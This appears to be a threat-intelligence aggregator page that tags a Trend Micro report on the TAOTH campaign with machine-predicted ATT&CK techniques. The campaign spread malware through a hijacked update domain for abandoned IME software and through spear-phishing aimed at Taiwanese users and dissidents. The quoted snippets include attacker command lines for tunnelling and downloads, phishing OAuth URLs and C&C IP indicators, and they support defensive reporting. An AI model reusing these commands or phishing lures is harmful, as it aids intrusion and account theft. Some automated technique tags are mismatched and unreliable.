TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

TAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents

Pierre Lee · 2025-08-28 · Read original ↗

ATT&CK techniques detected

20 predictions
T1566.002Spearphishing Link
92%
“type z. txt c : \ windows \ system32 \ cmd. exe / c code. exe tunnel service install c : \ windows \ system32 \ hostname. exe operation 2 : spear - phishing upon further investigation into the sogou zhuyin operation, we identified that one instance of the toshis malware was distr…”
T1566.002Spearphishing Link
89%
“mail. send & redirect _ uri = https % 3a % 2f % 2fauth. onedrive365 - jp. com % 2fgetauthtoken & response _ type = code & client _ id = e707daa3 - 579f - 4bae - bb7d - 89a73d52ffa1 as indicated by the urls, the oauth applications request scopes for email manipulation, such as gma…”
T1525Implant Internal Image
71%
“o / oauth2 / auth? response _ type = code & client _ id = 715259374054 - mst41mfku1h8l7ga5vbtrv8cm48h9nde. apps. googleusercontent. com & redirect _ uri = https % 3a % 2f % 2fwww. auth - web. com % 2fgm - oauth2 - callback & scope = https % 3a % 2f % 2fwww. googleapis. com % 2fau…”
T1566.001Spearphishing Attachment
71%
“chain for the infection routine, the attacker first sends spear - phishing emails to targeted victims. these emails include either a phishing url or a decoy document designed to entice the recipient to respond or interact with the malicious content. the attacker ’ s aim is to ach…”
T1041Exfiltration Over C2 Channel
66%
“information collector. it gathers filenames from the following locations : - desktop - program files once the filenames are collected, desfy transmits this data to the c & c server via the http post method. this functionality is likely used for profiling victims to determine suit…”
T1574Hijack Execution Flow
64%
“victims and identify high - value targets. victimology since sogou zhuyin targets users who understand zhuyin, most of the victims are based in taiwan. however, the impact extends beyond the region — taiwanese communities oversea have also been affected, resulting in a globally d…”
T1105Ingress Tool Transfer
63%
“sogou zhuyin in march 2025 and added the formerly legitimate but now - malicious domain dl [. ] sogouzhuyin [. ] com on it. our analysis confirms that the downloaded installer is the official, unmodified version. however, a few hours after installation, the automatic update proce…”
T1059.003Windows Command Shell
60%
“##appdata % c : \ windows \ system32 \ cmd. exe / c dir % localappdata % \ microsoft c : \ windows \ system32 \ cmd. exe / c dir % localappdata % \ microsoft \ office c : \ windows \ system32 \ cmd. exe / c curl - kojl " https : / / code. visualstudio. com / sha / download? build…”
T1195.002Compromise Software Supply Chain
55%
“sogou zhuyin in march 2025 and added the formerly legitimate but now - malicious domain dl [. ] sogouzhuyin [. ] com on it. our analysis confirms that the downloaded installer is the official, unmodified version. however, a few hours after installation, the automatic update proce…”
T1204.002Malicious File
49%
“chain for the infection routine, the attacker first sends spear - phishing emails to targeted victims. these emails include either a phishing url or a decoy document designed to entice the recipient to respond or interact with the malicious content. the attacker ’ s aim is to ach…”
T1204.002Malicious File
49%
“taoth campaign exploits end - of - support software to target traditional chinese users and dissidents apt & targeted attacks taoth campaign exploits end - of - support software to target traditional chinese users and dissidents the taoth campaign exploited abandoned software and…”
T1528Steal Application Access Token
48%
“o / oauth2 / auth? response _ type = code & client _ id = 715259374054 - mst41mfku1h8l7ga5vbtrv8cm48h9nde. apps. googleusercontent. com & redirect _ uri = https % 3a % 2f % 2fwww. auth - web. com % 2fgm - oauth2 - callback & scope = https % 3a % 2f % 2fwww. googleapis. com % 2fau…”
T1204.002Malicious File
43%
“victims and identify high - value targets. victimology since sogou zhuyin targets users who understand zhuyin, most of the victims are based in taiwan. however, the impact extends beyond the region — taiwanese communities oversea have also been affected, resulting in a globally d…”
T1071.001Web Protocols
41%
“that the taoth campaign, along with the threat activities from case 1 and 4 documented in itochu ' s research, can be attributed to the same threat actor group as supported by the following evidence : - shared c & c infrastructures : analysis identified overlapping c & c infrastr…”
T1195.002Compromise Software Supply Chain
41%
“several hundred victims were affected, with infections leading to additional post - exploitation activities. through infrastructure tracking, we observed that the same threat actor is also targeting high - value individuals primarily located in eastern asia. in this article, in a…”
T1071Application Layer Protocol
35%
“several hundred victims were affected, with infections leading to additional post - exploitation activities. through infrastructure tracking, we observed that the same threat actor is also targeting high - value individuals primarily located in eastern asia. in this article, in a…”
T1195.002Compromise Software Supply Chain
35%
“##fy, and toshis. infection chain according to an archived version of its wikipedia page, the sogou zhuyin service was terminated and discontinued in june 2019. however, starting in october 2024, the attacker hijacked the abandoned official update domain ( sogouzhuyin [. ] com ) …”
T1574.001DLL
33%
“several instances of modified binaries associated with this threat, including : - sunlogindesktopagent. exe - searchindexer. exe - procmon. exe the shellcode injected at the entry point uses adler - 32 to resolve api hashes. subsequently, it maps the c & c data onto the stack, as…”
T1071.001Web Protocols
32%
“or objecthostname : " auth. onedrive365 - jp. com " ) network – ip eventid : 3 and ( src : " 45. 32. 117. 177 " or src : " 64. 176. 50. 181 " or src : " 154. 90. 62. 210 " or src : " 38. 60. 203. 134 " or src : " 192. 124. 176. 51 " or dst : " 45. 32. 117. 177 " or dst : " 64. 17…”
T1572Protocol Tunneling
32%
“commands : table 1. the commands in c6door post - exploitation routines it appears that the attacker was still in the reconnaissance phase, primarily seeking high - value targets. as a result, no further post - exploitation activities were observed in the majority of victim syste…”

Summary

The TAOTH campaign exploited abandoned software and spear-phishing to deploy multiple malware families, targeting dissidents and other high-value individuals across Eastern Asia.